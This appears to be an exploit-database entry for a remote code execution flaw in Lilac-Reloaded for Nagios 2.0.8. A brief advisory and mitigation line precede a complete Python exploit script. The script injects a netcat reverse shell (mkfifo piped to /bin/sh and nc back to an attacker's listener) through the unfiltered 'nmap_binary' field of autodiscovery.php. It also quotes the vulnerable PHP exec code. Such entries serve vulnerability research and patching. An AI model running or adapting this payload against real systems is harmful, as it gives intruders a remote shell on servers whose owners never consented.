Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)

vendor:

Lilac-Reloaded

by:

max / Zoltan Padanyi

7.5

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: Lilac-Reloaded

Affected Version From: 2.0.8

Affected Version To: 2.0.8

Patch Exists: NO

Related CWE:

CPE: a:nagios:lilac-reloaded:2.0.8

Metasploit:

Other Scripts:

Platforms Tested: Debian 7.6

2023

Lilac-Reloaded for Nagios 2.0.8 – Remote Code Execution (RCE)

The autodiscovery feature of Lilac-Reloaded for Nagios 2.0.8 lacks any kind of input filtering, allowing an attacker to add their own commands terminated with a semicolon. This can be exploited to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be implemented to prevent malicious code from being executed.

Source

Exploit-DB raw data:

#!/usr/bin/env python

"""
# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2023-04-13
# Exploit Author: max / Zoltan Padanyi
# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit
# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download
# Version: 2.0.8
# Tested on: Debian 7.6
# CVE : N/A

The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;

Use at your own risk!

RCA - wild exec is ongoing without any filtering

in library/Net/Traceroute.php

   181	    function _setTraceroutePath($sysname)
   182	    {
   183	        $status    = '';
   184	        $output    = array();
   185	        $traceroute_path = '';
   186
   187	        if ("windows" == $sysname) {
   188	            return "tracert";
   189	        } else {
   190	            $traceroute_path = exec("which traceroute", $output, $status);
   [...]
   257	    function traceroute($host)
   258	    {
   259
   260	        $argList = $this->_createArgList();
   261	        $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];
   262	        exec($cmd, $this->_result);


"""

import requests
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)
parser.add_argument("-i", "--ip", help="Listener IP", required=True)
parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)
args = parser.parse_args()

rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"

body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}

try:
    r = requests.get(args.url)
    if r.ok:
	    print("[+] URL looks good...moving forward...")
	    print("[+] Sending exploit in...")
	    r = requests.post(args.url,data=body)
	    if r.ok:
		    print("[+] Got HTTP 200, check your listener!")
    else:
	    print("[-] Some kind of error happened, check the http response below!")
	    print(r.text)
except Exception as e:
	print("General exception: " + str(e))